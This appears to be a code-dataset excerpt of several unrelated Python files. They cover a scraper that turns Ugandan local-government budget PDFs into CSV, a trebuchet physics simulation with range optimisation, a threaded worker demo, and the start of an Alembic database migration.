'pdftohtml -xml -nodrm -zoom 1.5 -enc UTF-8 -noframes \"'\n if options:\n cmd += options\n cmd += pdfdata\n cmd += '\" \"'\n cmd += absDir\n cmd += inputname+'.xml\"'\n cmd = cmd + \" > NUL 2>&1\" # can't turn off output, so throw away even stderr yeuch\n os.system(cmd)\n with open(absDir+inputname+'.xml', 'r') as f:\n return f.read()\n\ndef main():\n #Before writing, try pdftohtml NAME.pdf -xml NAME.xml\n #Requires Poppler for windows in your path\n #http://blog.alivate.com.au/poppler-windows/\n datasets = []\n path = options.input\n basename = os.path.basename(path)\n inputname, inputextension = os.path.splitext(basename)\n print(\"Reading \"+basename+\"...\")\n xmldata = pdftoxml(path,False)\n root = lxml.etree.fromstring(xmldata)\n pages = list(root)\n output = []\n pageLen = len(pages)\n #Cascade these down...\n district = \"\"\n vote = \"\"\n workplan = \"\"\n AorB = \"\"\n AorBs = [\"A: Breakdown of Workplan Revenues: \",\"B: Breakdown of Workplan Expenditures: \"]\n budgetType = \"\"\n budgetTypes = [\"Recurrent Revenues\",\"Development Revenues\",\"Recurrent Expenditure\",\"Development Expenditure\"]\n for i in range(0,pageLen):\n isTable = False\n page = pages[i]\n elLen = len(page)\n for j in range(0,elLen):\n el = page[j]\n if el.tag == \"text\":\n left = int(el.attrib['left'])\n right = int(el.attrib['left'])+int(el.attrib['width'])\n top = int(el.attrib['top'])\n font = int(el.attrib['font'])\n if not isTable:\n if trytext(el)==\"Local Government Quarterly Performance Report\":\n prev1 = el.getprevious()\n prev2 = el.getprevious().getprevious()\n vote = \"\" if prev1 is None else trytext(prev1)\n district = \"\" if prev2 is None else trytext(prev2)\n #Scrape all page text by going backwards and forwards...\n pageTexts = []\n pageTexts.append(trytext(el))\n #Backwards\n prev = el.getprevious()\n while prev is not None and prev.tag == \"text\":\n pageTexts.append(trytext(prev))\n prev = prev.getprevious()\n #Forwards\n nxt = el.getnext()\n while nxt is not None and nxt.tag == \"text\":\n pageTexts.append(trytext(nxt))\n nxt = nxt.getnext()\n if AorBs[0] in pageTexts or AorBs[1] in pageTexts or budgetTypes[0] in pageTexts or budgetTypes[1] in pageTexts or budgetTypes[2] in pageTexts or budgetTypes[3] in pageTexts:\n workplans = [elemText for elemText in pageTexts if elemText[:9]==\"Workplan \" and \":\" in elemText]\n if len(workplans)>=1:\n workplan = workplans[0] if len(workplans)==1 else workplans[1]\n isTable = True\n else:\n if trytext(el)==\"Local Government Quarterly Performance Report\":\n prev1 = el.getprevious()\n prev2 = el.getprevious().getprevious()\n vote = \"\" if prev1 is None else trytext(prev1)\n district = \"\" if prev2 is None else trytext(prev2)\n #Scrape all page text by going backwards and forwards...\n pageTexts = []\n pageTexts.append(trytext(el))\n #Backwards\n prev = el.getprevious()\n while prev is not None and prev.tag == \"text\":\n pageTexts.append(trytext(prev))\n prev = prev.getprevious()\n #Forwards\n nxt = el.getnext()\n while nxt is not None and nxt.tag == \"text\":\n pageTexts.append(trytext(nxt))\n nxt = nxt.getnext()\n if AorBs[0] not in pageTexts and AorBs[1] not in pageTexts and budgetTypes[0] not in pageTexts and budgetTypes[1] not in pageTexts and budgetTypes[2] not in pageTexts and budgetTypes[3] not in pageTexts:\n isTable = False\n continue\n if trytext(el) in AorBs:\n AorB = trytext(el)\n elif trytext(el) in budgetTypes:\n budgetType = trytext(el)\n elif abs(left-73)<5 or abs(left-133)<5 or abs(left-116)<5 or abs(left-121)<5:\n #Find row by going backwards and forwards...\n row = []\n elTop = int(el.attrib['top'])\n obj = {}\n obj['text'] = trytext(el)\n obj['top'] = int(el.attrib['top'])\n obj['left'] = int(el.attrib['left'])\n obj['right'] = int(el.attrib['left'])+int(el.attrib['width'])\n row.append(obj)\n #Backwards\n prev = el.getprevious()\n if prev is not None:\n prevTop = int(prev.attrib['top'])\n else:\n prevTop = 0\n while prev is not None and \"top\" in prev.attrib:\n obj = {}\n obj['text'] = trytext(prev)\n obj['top'] = int(prev.attrib['top'])\n obj['left'] = int(prev.attrib['left'])\n obj['right'] = int(prev.attrib['left'])+int(prev.attrib['width'])\n if abs(elTop-prevTop)<4:\n row.append(obj)\n prev = prev.getprevious()\n if prev is not None and \"top\" in prev.attrib:\n prevTop = int(prev.attrib['top'])\n else:\n prevTop = 0\n #Forwards\n nxt = el.getnext()\n if nxt is not None and \"top\" in nxt.attrib:\n nxtTop = int(nxt.attrib['top'])\n else:\n nxtTop = 0\n while nxt is not None:\n obj = {}\n obj['text'] = trytext(nxt)\n obj['top'] = int(nxt.attrib['top'])\n obj['left'] = int(nxt.attrib['left'])\n obj['right'] = int(nxt.attrib['left'])+int(nxt.attrib['width'])\n obj['font'] = int(nxt.attrib['font'])\n if abs(elTop-nxtTop)<4:\n row.append(obj)\n nxt = nxt.getnext()\n if nxt is not None and \"top\" in nxt.attrib:\n nxtTop = int(nxt.attrib['top'])\n else:\n nxtTop = 0\n rowvals = operator.itemgetter('left')\n row.sort(key=rowvals)\n if len(row)>=2 and re.search(\"[a-zA-Z\\/\\\\\\(\\)_]\",\"\".join([item['text'] for item in row[1:]]))==None:\n #Find missing pieces of data, replace them with blanks \n rowArr = []\n rowArr.append(row[0]['text'])\n rights = [449]\n for r in range(len(rights)):\n right = rights[r]\n textMatch = False\n for element in row[1:]:\n if abs(element['right']-right)<18:\n textMatch = element['text']\n if textMatch:\n rowArr.append(textMatch)\n else:\n rowArr.append(\"\")\n metaObj = {}\n metaObj[\"Source\"] = rowArr[0]\n metaObj[\"AB\"] = rowArr[1]\n #2013/14 Approved Budget\n obj = {}\n obj['Year']=\"2013/14 Approved Budget\"\n obj['Government']=\"District Government\"\n obj['District']=district\n obj['Vote']=vote\n obj['Revenue/Expenditure'] = \"Revenue\" if AorB[:1]==\"A\" else \"Expenditure\"\n obj['Budget Type'] = budgetType\n obj['Workplan'] = workplan\n obj['Value']=metaObj[\"AB\"]\n obj['Revenue Source']=metaObj[\"Source\"]\n output.append(obj)\n datasets+=output\n if options.debug:\n pdb.set_trace()\n keys = datasets[0].keys()\n with open(options.output, 'wb') as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(datasets)\n sys.stdout.write(\"\\n\")\n print(\"Done.\")\n\nmain()","sub_path":"DevInit/Uganda/Spotlight/expend_scrape-13-14-Tororo.py","file_name":"expend_scrape-13-14-Tororo.py","file_ext":"py","file_size_in_byte":11601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"303281833","text":"''' a bit more in the comment...\n'''\n\nimport dynamics.simulation\nfrom dynamics.frame import Frame\nfrom dynamics.spring import NailSpring\nfrom dynamics.object import Rectangle, Circle, Beam\nfrom dynamics.constraint import Nail, Rod, Pin, Shelf\nfrom dynamics.animation import Animation\n\nfrom dynamics.constants import foot2meter, inch2meter, meter2foot\nfrom dynamics.misc import length_, rot2radians, radians2rot\nfrom dynamics.constants import lb2kgram, kgram2lb, newton2lb\nfrom dynamics.constants import pine_density, steel_density\n\nfrom flight import Flight\n\nimport scipy\nimport scipy.interpolate\nimport numpy as np\nfrom math import pi, sin, cos, sqrt, acos, atan2\n#from scipy.optimize.optimize import fmin\nfrom scipy.optimize.minpack import fsolve\n#from scipy.interpolate.fitpack2 import UnivariateSpline\nfrom pylab import plot\n\nscipy.set_printoptions(precision=5, linewidth=200)\ndef treb( sling_length = 8.54665, # sling length, feet\n ramp_length = 11, # ramp length, feet\n link_sum = 5.587, # sum of upper and lower link lengths, feet\n hanger_x = 11.38508, # feet\n hanger_y = -2,\n hinge_x = (6.+2.)/12., # feet\n hinge_y = -4.0,\n alpha=90, # arm start angle, ccw from horizontal (degrees)\n omega=10, # cocked angle between upper link and lower link\n cw_drop = 5.0, # feet\n cw_weight = 4581., # pounds\n cw_moment_arm = 10.41, # distance from hinge to cw center of gravity, feet\n cw_moment = 3.516e6, # counterweight moment about its CG, lb*ft^2\n upper_link_weight = 2*58., # pounds\n lower_link_weight = 2*52., # pounds\n link_axle_weight = 106, # pounds\n connector_rod_weight = 84.8, # pounds\n connector_brace_weight = 105, # pounds\n pumpkin_weight = 10.0, # pounds\n sling_weight = 1.7, # pounds\n sim_duration = 2.0, # seconds\n dry_fire = False, # True to disable sling from time 0 \n time_step = 0.001, # seconds\n slide_y = -9, # feet\n arm_depth = (10.+1./4.)/12., # inches\n arm_thick = (5.+1./4.)/12., # inches\n arm_end_depth = (6.+5./8)/12.,# inches\n arm_end_thick = (3.+1./8)/12.,# inches\n release_pin_weight = 9, # pounds\n release_time = 0.0, #seconds\n debug = True):\n\n sim = dynamics.simulation.Simulation(max_time=sim_duration,\n time_step=time_step)\n sim.debug=debug\n\n # convert arguments to metric and radians\n sling_length = foot2meter(sling_length)\n hanger_pos = foot2meter(np.array((hanger_x, hanger_y)))\n del hanger_x, hanger_y\n hinge_pos = foot2meter(np.array((hinge_x, hinge_y)))\n del hinge_x, hinge_y\n slide_y = foot2meter(slide_y)\n arm_depth = foot2meter(arm_depth)\n arm_thick = foot2meter(arm_thick)\n arm_end_depth = foot2meter(arm_end_depth)\n arm_end_thick = foot2meter(arm_end_thick)\n ramp_length = foot2meter(ramp_length)\n link_sum = foot2meter(link_sum)\n sim.release_time = release_time\n alpha = scipy.deg2rad(alpha)\n omega = scipy.deg2rad(omega)\n cw_drop = foot2meter(cw_drop)\n cw_mass = lb2kgram(cw_weight)\n cw_moment_arm = foot2meter(cw_moment_arm)\n cw_moment = cw_moment / 32.174049 * 0.00029263965 # convert lb to slug, then\n # slug*in^2 to kgram*meter^2\n connector_rod_mass = lb2kgram(connector_rod_weight)\n connector_brace_mass = lb2kgram(connector_brace_weight)\n upper_link_mass = lb2kgram(upper_link_weight)\n lower_link_mass = lb2kgram(lower_link_weight)\n link_axle_mass = lb2kgram(link_axle_weight)\n pumpkin_mass = lb2kgram(pumpkin_weight)\n sling_mass = lb2kgram(sling_weight)\n release_pin_mass = lb2kgram(release_pin_weight)\n\n # long arm length to reach slide\n long_arm_length = -slide_y / np.sin(alpha) - inch2meter(0)\n\n # compute rest cw position thru triangulation\n rest_cw_ctr = circle_intersection(hanger_pos, link_sum,\n hinge_pos, ramp_length)\n\n # compute cocked cw position on circle about hinge, up 'drop' meters from rest position\n cocked_cw_ctr = np.array((None, rest_cw_ctr[1] + cw_drop))\n # ramp_length**2 = (x-hinge_x)**2 + (y-hinge_y)**2\n cocked_cw_ctr[0] = hinge_pos[0] + sqrt(ramp_length**2 - (cocked_cw_ctr[1]-hinge_pos[1])**2)\n\n # cocked connection point is on ellipse w/ foci at hanger and cocked_cw, 'string' length\n # equal to link_sum, 'string' interior angle omega. In maxima:\n # r2: s-r1\n # eq1: d^2 = r1^2+r2^2-2*r1*r2*cos(omega)\n # solve(eq1, r1)\n d = length_(hanger_pos - cocked_cw_ctr)\n s = link_sum\n sol1 = -(sqrt(s**2*cos(omega)**2 + 2*d**2*cos(omega)-s**2+2*d**2) - s*cos(omega) - s)/(2*cos(omega)+2)\n sol2 = (sqrt(s**2*cos(omega)**2 + 2*d**2*cos(omega)-s**2+2*d**2) + s*cos(omega) + s)/(2*cos(omega)+2)\n upper_link_length = min(sol1,sol2)\n lower_link_length = max(sol1,sol2)\n if abs((upper_link_length+lower_link_length-link_sum)/link_sum) > 0.001:\n print(\"link sum error\")\n print(\" upper_link_length=\", meter2foot(upper_link_length))\n print(\" lower_link_length=\", meter2foot(lower_link_length))\n print(\" link_sum=\", meter2foot(link_sum))\n raise ValueError\n cocked_connection_pos = circle_intersection(cocked_cw_ctr, lower_link_length,\n hanger_pos, upper_link_length)\n\n # all link angles measured at top of link\n cocked_upper_link_angle = rot2radians(cocked_connection_pos - hanger_pos)\n cocked_lower_link_angle = rot2radians(cocked_cw_ctr - cocked_connection_pos)\n rest_upper_link_angle = rot2radians(rest_cw_ctr - hanger_pos)\n rest_lower_link_angle = rest_upper_link_angle\n rest_connection_pos = hanger_pos + upper_link_length * radians2rot(rest_upper_link_angle)\n\n # end of short arm is on ellipse with foci at axle and cocked connection, with 'string' length\n # distance from axle to rest connection point.\n axle_rest_connection_distance = length_(rest_connection_pos)\n ellipse_axis_angle = rot2radians(-cocked_connection_pos)\n ellipse_a = axle_rest_connection_distance / 2.0\n ellipse_f = length_(cocked_connection_pos) / 2.0\n ellipse_e = ellipse_f / ellipse_a\n theta = ellipse_axis_angle - cocked_upper_link_angle\n connector_length = ellipse_a * (1-ellipse_e**2) / (1 - ellipse_e*cos(theta))\n\n # cocked_connection angle measured at connection point\n cocked_connection_angle = cocked_upper_link_angle\n cocked_short_arm_end = cocked_connection_pos + connector_length * radians2rot(cocked_connection_angle)\n short_arm_length = length_(cocked_short_arm_end)\n if abs((short_arm_length + connector_length - axle_rest_connection_distance)/axle_rest_connection_distance) > 0.001:\n print (\"short arm length error:\")\n print (\" ellipse_a=\", meter2foot(ellipse_a))\n print (\" ellipse_f=\", meter2foot(ellipse_f))\n print (\" ellipse_e=\", ellipse_e)\n print (\" theta=\", scipy.rad2deg(theta))\n print (\" connector_length=\", meter2foot(connector_length))\n print (\" short_arm_length=\", meter2foot(short_arm_length))\n print (\" axle_rest_connection_distance=\",\n meter2foot(axle_rest_connection_distance))\n raise ValueError\n\n # short arm angle measured at axle\n cocked_short_arm_angle = rot2radians(cocked_short_arm_end)\n\n # compute beta, angle from long arm to short arm\n beta = pi + alpha - cocked_short_arm_angle\n\n # long arm end, cocked\n cocked_long_arm_end = long_arm_length * radians2rot(pi+alpha)\n\n # other dimensions\n pumpkin_diameter = inch2meter(8.0)\n pumpkin_ctr = cocked_long_arm_end + np.array((sling_length, 0.0))\n\n if debug:\n # rest short arm angle and position (for printing only)\n rest_short_arm_angle = rot2radians(rest_connection_pos)\n rest_short_arm_end = short_arm_length * radians2rot(rest_short_arm_angle)\n\n # rest long arm angle and position (for printing only)\n rest_long_arm_angle = (pi+alpha) + (rest_short_arm_angle - cocked_short_arm_angle)\n rest_long_arm_end = long_arm_length * radians2rot(rest_long_arm_angle)\n\n print(\"slide_y=\", meter2foot(slide_y))\n print(\"long_arm_length=\", meter2foot(long_arm_length))\n print(\"pumpkin=\", meter2foot(pumpkin_ctr))\n print(\"hanger=\", meter2foot(hanger_pos))\n print(\"cocked_connection=\", meter2foot(cocked_connection_pos))\n print(\"cocked_cw=\", meter2foot(cocked_cw_ctr))\n print(\"cocked_short_arm=\", meter2foot(cocked_short_arm_end))\n print(\"cocked_long_arm=\", meter2foot(cocked_long_arm_end))\n print(\"cocked_lower_link_angle=\", scipy.rad2deg(cocked_lower_link_angle))\n print(\"rest_lower_link_angle=\", scipy.rad2deg(rest_lower_link_angle))\n print(\"connector_length=\", meter2foot(connector_length))\n print(\"lower_link_length=\", meter2foot(lower_link_length))\n print(\"rest_cw_ctr=\", meter2foot(rest_cw_ctr))\n print(\"rest_connection=\", meter2foot(rest_connection_pos))\n print(\"rest_short_arm=\", meter2foot(rest_short_arm_end))\n print(\"rest_long_arm=\", meter2foot(rest_long_arm_end))\n \n ### Machine frame origin is at axle\n sim.machineFrame=Frame(sim, \"machine\", theta=0, origin=(0,0))\n sim.machineFrame.machine=Rectangle(sim.machineFrame,\n l=hanger_pos[0]+2.0,\n w=-slide_y+1.0,\n theta=0,\n origin=(hanger_pos[0]/2,\n (slide_y)/2),\n mass=lb2kgram(5000),\n color=(0,0,0))\n front_foot_pos = (hanger_pos[0], slide_y-0.5)\n rear_foot_pos = (0, slide_y - 0.5)\n sim.machineFrame.rear_foot=Rectangle(sim.machineFrame,\n l=0.3,\n w=0.1,\n origin=rear_foot_pos,\n mass=0,\n color=(0,0,0))\n sim.machineFrame.front_foot=Rectangle(sim.machineFrame,\n l=0.3,\n w=0.1,\n origin=front_foot_pos,\n mass=0,\n color=(0,0,0))\n\n ### Arm frame origin is at axle. Framespace has long arm horizontal to the left\n sim.armFrame=Frame(sim, \"arm\", theta=alpha, origin=(0,0))\n sim.armFrame.long_arm=Beam(sim.armFrame,\n x0=-long_arm_length, d0=arm_end_depth, t0=arm_end_thick,\n x1=0, d1=arm_depth, t1=arm_thick,\n density=pine_density,\n color=(0.8,0.3,0))\n sim.armFrame.short_arm=dynamics.object.Rectangle(sim.armFrame,\n l=inch2meter(18.99),\n w=inch2meter(8.0),\n theta=-beta,\n origin=(-inch2meter(15.0)*cos(beta),\n inch2meter(15.0)*sin(beta)),\n mass=lb2kgram(53),\n color=(0.8,0.3,0))\n sim.armFrame.connector_pin=dynamics.object.Circle(sim.armFrame,\n radius=inch2meter(2.0),\n origin=(-short_arm_length*cos(beta),\n short_arm_length*sin(beta)),\n mass=lb2kgram(1),\n color=(0.8,0.3,0))\n sim.armFrame.long_arm_plate=dynamics.object.Rectangle(sim.armFrame,\n l=inch2meter(27.5),\n w=inch2meter(8.0),\n theta=0.0,\n origin=(inch2meter(-6.25), 0),\n mass=lb2kgram(63),\n color=(0.8,0.3,0))\n sim.armFrame.release_pin=dynamics.object.Circle(sim.armFrame,\n radius=inch2meter(6),\n origin=(-long_arm_length, 0),\n mass=release_pin_mass, color=(1.0, 1.0, 1.0))\n\n # Wdight frame origin is at pivot point, ramp horizontal to the right\n cocked_ramp_angle = rot2radians(cocked_cw_ctr-hinge_pos)\n sim.weightFrame=dynamics.frame.Frame(sim, \"weight\", theta=cocked_ramp_angle, origin=hinge_pos)\n sim.weightFrame.ramp = dynamics.object.Rectangle(sim.weightFrame, l=ramp_length, w=inch2meter(4),\n mass=0, color=(0.3,0.5,0.2),\n origin = (ramp_length/2,0))\n sim.weightFrame.cw = dynamics.object.Rectangle(sim.weightFrame, l=foot2meter(2.6), w=foot2meter(2.6),\n color=(0.3,0.5,0.2),\n mass=cw_mass,\n origin = (cw_moment_arm,0),\n moment = cw_moment)\n\n # Lower link frame origin is at end of ramp\n sim.lowerLinkFrame = dynamics.frame.Frame(sim, \"lower link\", origin=cocked_cw_ctr,\n theta = cocked_lower_link_angle-pi)\n sim.lowerLinkFrame.link = dynamics.object.Rectangle(sim.lowerLinkFrame, l=lower_link_length, w=inch2meter(6),\n mass=lower_link_mass, color=(1.0,0.0,0.0),\n origin=(lower_link_length/2, 0.0))\n sim.lowerLinkFrame.axle=dynamics.object.Circle(sim.lowerLinkFrame,\n radius=inch2meter(3),\n origin=(lower_link_length, 0.0),\n mass=link_axle_mass, color=(1.0, 0.0, 0.0))\n\n # Upper link frame origin is the hanger\n cocked_upper_link_angle = rot2radians(cocked_connection_pos-hanger_pos)\n sim.upperLinkFrame = dynamics.frame.Frame(sim, \"upper link\", origin=hanger_pos,\n theta = cocked_upper_link_angle)\n sim.upperLinkFrame.link = dynamics.object.Rectangle(sim.upperLinkFrame, l=upper_link_length, w=inch2meter(6),\n mass=upper_link_mass, color=(1.0,0.0,0.0),\n origin=(upper_link_length/2, 0.0))\n\n # Connector frame origin is the end of the short arm\n sim.connectorFrame = dynamics.frame.Frame(sim, \"connector\", origin=cocked_short_arm_end,\n theta = rot2radians(cocked_connection_pos - cocked_short_arm_end))\n sim.connectorFrame.rod = dynamics.object.Rectangle(sim.connectorFrame, l=connector_length,\n w=inch2meter(2),\n mass=connector_rod_mass,\n color=(0.0, 0.0, 0.0),\n origin=(connector_length/2, 0.0))\n sim.connectorFrame.stiffener = dynamics.object.Rectangle(sim.connectorFrame, l=connector_length,\n w=inch2meter(4.0),\n mass=lb2kgram(100),\n color=(0.0, 0.0, 0.0),\n origin=(connector_length/2, inch2meter(3.0)))\n sim.connectorFrame.brace = dynamics.object.Rectangle(sim.connectorFrame, l=foot2meter(2),\n w=inch2meter(4),\n mass=connector_brace_mass,\n color=(0.0, 0.0, 0.0),\n origin=(connector_length-foot2meter(1), 0.0))\n\n # Pumpkin\n sim.pumpkinFrame=dynamics.frame.Frame(sim, \"pumpkin\", origin=pumpkin_ctr)\n sim.pumpkinFrame.pumpkin=dynamics.object.Circle(sim.pumpkinFrame,\n radius=pumpkin_diameter/2.0,\n mass=pumpkin_mass, color=(1.0, 0.5, 0))\n sim.pumpkinFrame.sling=dynamics.object.Circle(sim.pumpkinFrame,\n radius=pumpkin_diameter/2.0,\n mass=sling_mass, color=(1.0, 0.5, 0))\n\n # initialize frames\n for frame in sim.frames:\n frame.init()\n\n # define constraints\n sim.rear_foot = Nail(sim, \"rear foot\",\n obj=sim.machineFrame.rear_foot,\n xobj=(0,0),\n xworld=rear_foot_pos)\n\n sim.front_foot = NailSpring(sim, \"front foot\",\n obj=sim.machineFrame.front_foot,\n xobj=(0,0),\n x_world=front_foot_pos,\n spring_constant=1e6,\n damping_constant=500e3)\n\n sim.axle = Pin(sim, \"axle\",\n obj0=sim.armFrame.long_arm,\n xobj0=(0, 0),\n obj1=sim.machineFrame)\n\n sim.hinge =Pin(sim, \"hinge\",\n obj0=sim.weightFrame.ramp,\n xobj0=(-ramp_length/2, 0.0),\n obj1=sim.machineFrame)\n\n sim.hanger = Pin(sim, \"hanger\",\n obj0=sim.upperLinkFrame.link,\n xobj0=(-upper_link_length/2.0,0.0),\n obj1=sim.machineFrame)\n\n sim.linkPin = Pin(sim, \"linkPin\",\n obj0=sim.upperLinkFrame.link,\n xobj0= (upper_link_length/2.0, 0.0),\n obj1=sim.lowerLinkFrame.link,\n xobj1 = (lower_link_length/2.0, 0.0))\n\n sim.rampPin = dynamics.constraint.Pin(sim, \"rampPin\",\n obj0=sim.weightFrame.ramp,\n xobj0= (ramp_length/2.0, 0.0),\n obj1=sim.lowerLinkFrame.link,\n xobj1 = (-lower_link_length/2.0, 0.0))\n\n sim.connectorPin1 = Pin(sim, \"connectorPin1\",\n obj0=sim.armFrame.connector_pin,\n xobj0=(0.0,0.0),\n obj1=sim.connectorFrame.rod,\n xobj1 = (-connector_length/2.0, 0.0))\n\n sim.connectorPin2 = Pin(sim, \"connectorPin2\",\n obj0=sim.upperLinkFrame.link,\n xobj0=(upper_link_length/2.0,0.0),\n obj1=sim.connectorFrame.rod,\n xobj1 = (connector_length/2.0, 0.0))\n\n sim.sling=Rod(sim, \"sling\",\n obj0=sim.armFrame.long_arm, xobj0=(-long_arm_length,\n 0),\n obj1=sim.pumpkinFrame.pumpkin, xobj1=(0.0,0.0),\n length=sling_length)\n '''\n sim.trigger = Rod(sim, \"trigger\",\n obj0=sim.pumpkinFrame.pumpkin,\n xobj0= (0.0, 0.0),\n obj1=sim.machineFrame.front_foot,\n xobj1= (0.0,0.0))\n '''\n\n sim.slide=Shelf(sim, \"slide\",\n obj=sim.pumpkinFrame.pumpkin,\n xobj=(0,0),\n height=slide_y)\n\n if (dry_fire):\n sim.sling.enabled = False\n\n print( \" running simulation\")\n from time import clock\n tstart=clock()\n sim.run(continue_sim, debug=debug)\n print (\" done: time=%g sec\" % (clock()-tstart))\n\n if not sim.release_time:\n sim.range = Y2range(sim,sim.Y)\n range_spline = scipy.interpolate.UnivariateSpline(sim.t, sim.range, k=3,s=0.0)\n d0,t0 = max( (range,time) for range,time in zip(sim.range, sim.t) ) # find guess\n sim.tmax = fsolve(range_spline, t0, args=1) # root of first derivative of range\n sim.maxrange = range_spline(sim.tmax)\n launchDegrees_spline = scipy.interpolate.UnivariateSpline(sim.t, Y2launchDegrees(sim.Y), k=3,s=0.0)\n sim.launchDegrees = launchDegrees_spline(sim.tmax)\n print (\" distance=%g feet at %g sec\" % (meter2foot(sim.maxrange), sim.tmax))\n else:\n sim.range=np.zeros(len(sim.t))\n sim.maxrange=0\n\n sim.Fmax = max(sim.hanger.Fvec())\n print(\" max force on hanger = %g pounds\" % (newton2lb(sim.Fmax)))\n return(sim)\n\ndef circle_intersection(ctr1, rad1, ctr2, rad2):\n \"\"\"Return intersection of two circles.\n\n Intersection returned is the one in the ccw direction from the vector\n ctr1->ctr2.\n\n \"\"\"\n\n base_len = length_(ctr2-ctr1)\n # alpha is angle from vector ctr1->ctr2 to vector ctr1->isect\n alpha = acos( (base_len**2 + rad1**2 - rad2**2) / (2 * base_len * rad1) )\n # beta is angle from positive x axis to vector ctr1->ctr2\n beta = rot2radians(ctr2-ctr1)\n isect = ctr1 + rad1*radians2rot(alpha+beta)\n return isect\n\ndef continue_sim(sim, time, y):\n \"continue simulation?\"\n\n #if time>0.001:\n # sim.trigger.enabled = False\n\n if sim.slide.enabled:\n shelf_force = sim.slide.forces[0][1]\n if shelf_force < 0.0:\n sim.slide.enabled = False\n\n if 0:\n if sim.sling.enabled:\n v = sim.pumpkinFrame.v\n angle = atan2(v.A[1], v.A[0])\n if v.A[0] > 0.0 and v.A[1] > 0.0 and angle <= sim.release_angle:\n sim.maxrange = Y2range(sim,y)[0]\n sim.sling.enabled = False\n #return False\n return True\n else:\n if sim.release_time:\n if time >= sim.release_time:\n sim.sling.enabled = False\n return True\n if sim.armFrame.theta >= -3*pi/4:\n return True\n if sim.pumpkinFrame.v.A1[1] > 0:\n return True\n return False\n\ndef Y2range(sim, Y, with_air_friction=True):\n if (len(Y.shape)==1):\n Y = Y.reshape([1,len(Y)])\n idx = sim.pumpkinFrame.idx\n x0 = Y[:,6*idx]\n y0 = Y[:,6*idx+1]\n vx0 = Y[:,6*idx+3]\n vy0 = Y[:,6*idx+4]\n \n if not with_air_friction:\n tof = 2.0 * vy0 / scipy.constants.g\n tof[tof<0.0] = 0.0\n return (tof*vx0)\n else: \n range = np.zeros(len(x0))\n flight = Flight(mass=sim.pumpkinFrame.pumpkin.mass,\n area=pi*sim.pumpkinFrame.pumpkin.radius**2)\n for i in np.arange(len(x0)):\n if (vy0[i] > 0) & (vx0[i] > 0):\n flight.run([x0[i],y0[i]], [vx0[i],vy0[i]])\n range[i] = flight.range()\n return range\n\ndef Y2launchDegrees(Y):\n if (len(Y.shape)==1):\n Y = Y.reshape([1,len(Y)])\n vx = Y[:,33]\n vy = Y[:,34]\n return (180./pi*np.arctan2(vy, vx))\n\n\ndef trebPEvec(sim):\n return (sim.weightFrame.PEvec() +\n sim.upperLinkFrame.PEvec() +\n sim.lowerLinkFrame.PEvec() +\n sim.connectorFrame.PEvec() +\n sim.armFrame.PEvec())\n\ndef trebKEvec(sim):\n return (sim.weightFrame.KEvec() +\n sim.upperLinkFrame.KEvec() +\n sim.lowerLinkFrame.KEvec() +\n sim.connectorFrame.KEvec() +\n sim.armFrame.KEvec())\n\ndef plotEnergies(sim):\n plot (sim.t, trebPEvec(sim) - min(trebPEvec(sim)))\n plot (sim.t, trebKEvec(sim))\n plot (sim.t, (trebPEvec(sim) - min(trebPEvec(sim)) +\n trebKEvec(sim)))\n plot (sim.t, trebKEvec(sim))\n plot (sim.t, sim.pumpkinFrame.KEvec() + sim.pumpkinFrame.PEvec())\n \n\ndef opt(X):\n global sim, X0\n X0 = X \n print (\"X=\", X)\n try:\n sim = treb(debug=False, time_step=0.0001, sim_duration=0.7,\n sling_length=X[0], link_sum=X[1], hanger_x=X[2], slide_y=-9)\n #return -sim.maxrange\n return -sim.maxrange / sim.Fmax**0.10\n\n except KeyboardInterrupt:\n raise KeyboardInterrupt\n except:\n return 0.0\n\n#X0 = array([ 8.70381, 6.08564, 10.3123 ])\n#X0 = array([ 8, 6, 10 ])\n#X0 = [ 9.62859, 6.23794, 9.98966]\n#X0 = [ 8.70153, 6.04452, 10.43426]\n#X0 = array([ 8.68625, 6.00475, 10.44 ])\n#X0 = array([ 8.21222, 5.58682, 11.43518, -9.0])\n#X0 = array([8.411, 5.587, 11.433])\nX0 = np.array([8.54665, 5.587, 11.38508])\n#lower = array([ 6.0, 3.0, 5.0])\n#upper = array([ 12.0, 9.0, 12.0])\n#result=scipy.optimize.fmin(opt, X0)\n#result=scipy.optimize.fmin_l_bfgs_b(opt, X0, approx_grad=True, bounds=None)\n#result=scipy.optimize.anneal(opt, X0, lower=lower, upper=upper, T0=0.001, feps=1e-60, full_output=True)\n\nif __name__ == '__main__':\n sim=treb(debug=True)\n anim=Animation(sim, Y2range)","sub_path":"treb_sim/src/first_in_fright_2012.py","file_name":"first_in_fright_2012.py","file_ext":"py","file_size_in_byte":25532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396860766","text":"from tasks import worker_task\nfrom threading import Thread, Lock\nimport time\n\nn_workers = 5 # number of workers\n\n\nclass MyThread(Thread):\n \"\"\" Define a new thread by subclassing the threading.Thread class\"\"\"\n\n def __init__(self, id, lock, outfile):\n Thread.__init__(self)\n self.id = id\n self.lock = lock\n self.outfile = outfile\n\n def run(self):\n worker_task(self.id, lock, outfile)\n\n\nif __name__ == '__main__':\n print(\"Spawn thread workers...\")\n workers = []\n lock = Lock() # To sharing resource between threads\n outfile = 'multithreaded_output.txt'\n\n start_time = time.time()\n for i in range(0, n_workers):\n worker_thread = MyThread(i, lock, outfile)\n worker_thread.start()\n workers.append(worker_thread)\n\n for t in workers:\n t.join()\n\n print(\"All thread workers finish...\")\n end_time = time.time()\n\n with open(outfile, 'a') as f:\n f.write(\"Program: {0} seconds\\n\".format(end_time - start_time))\n","sub_path":"multithreaded_workers.py","file_name":"multithreaded_workers.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"529830594","text":"\"\"\"empty message\n\nRevision ID: 64ebdc56387f\nRevises: 76f9b748967b\nCreate Date: 2018-06-08 15:39:11.532212\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '64ebdc56387f'\ndown_revision = '76f9b748967b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('training_task', sa.Column('parent_training_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'training_task', 'training_task', ['parent_training_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef 